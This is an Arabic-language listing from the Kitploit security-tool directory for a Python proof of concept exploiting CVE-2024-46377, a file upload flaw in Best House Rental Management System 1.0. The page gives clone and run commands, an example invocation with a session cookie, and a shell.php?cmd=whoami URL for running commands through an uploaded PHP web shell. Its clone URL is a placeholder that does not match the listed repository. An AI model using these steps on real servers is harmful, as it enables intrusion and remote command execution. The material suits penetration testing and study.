Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-46377 — نص برمجي بلغة Python لإثبات المفهوم (PoC) يستغل ثغرة رفع ملف تعسفي في نظام إدارة تأجير المنازل الأفضل (Best House Rental Management System) الإصدار 1.0 لرفع غلاف ويب PHP وتنفيذ أوامر عن بُعد. | Kitploit
أدوات/GitHubGitHub/vidura2/cve-2024-46377
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubvidura2/cve-2024-46377

CVE-2024-46377

نص برمجي بلغة Python لإثبات المفهوم (PoC) يستغل ثغرة رفع ملف تعسفي في نظام إدارة تأجير المنازل الأفضل (Best House Rental Management System) الإصدار 1.0 لرفع غلاف ويب PHP وتنفيذ أوامر عن بُعد.

عرض المستودع
210منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-46377

إثبات المفهوم لثغرة رفع الملفات التعسفية في Best House Rental Management System 1.0

نظرة عامة

يشرح هذا السكريبت بلغة بايثون كيفية استغلال ثغرة رفع الملفات التعسفية في Best House Rental Management System 1.0. تسمح الثغرة للمهاجم برفع ملف ضار (مثل قشرة ويب PHP) وتنفيذ أوامر تعسفية على الخادم المستهدف.

الاستخدام

  1. استنسخ المستودع وانتقل إلى الدليل:

    root@kitploit:~
    git clone https://github.com/yourusername/house-rental-poc.git
    cd house-rental-poc
    

    شغّل أداة الاستغلال باستخدام المعاملات التالية:

    bash

    python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>

    target_url: عنوان URL لصفحة رفع الملفات القابلة للاستغلال (مثال: http:///rental/admin_class.php?view=save_settings) file_upload_path: المسار الذي تُخزَّن فيه الملفات المرفوعة (مثال: http:///path/to/uploaded/files) session_cookie: كعكة الجلسة للمستخدم المُوثَّق

إذا نجحت، ستتمكن من تنفيذ الأوامر على الخادم المستهدف من خلال زيارة:

bash

root@kitploit:~
http://<file_upload_path>/shell.php?cmd=whoami

اختبره بتنفيذ أوامر مثل whoami أو uname -a.

مثال

python exploit_house_rental.py http://127.0.0.1/rental/admin_class.php?view=save_settings http://127.0.0.1/uploads/ SESSION_ID=123456789

هذا الكود مُصدر تحت رخصة MIT.

تنزيل الأداة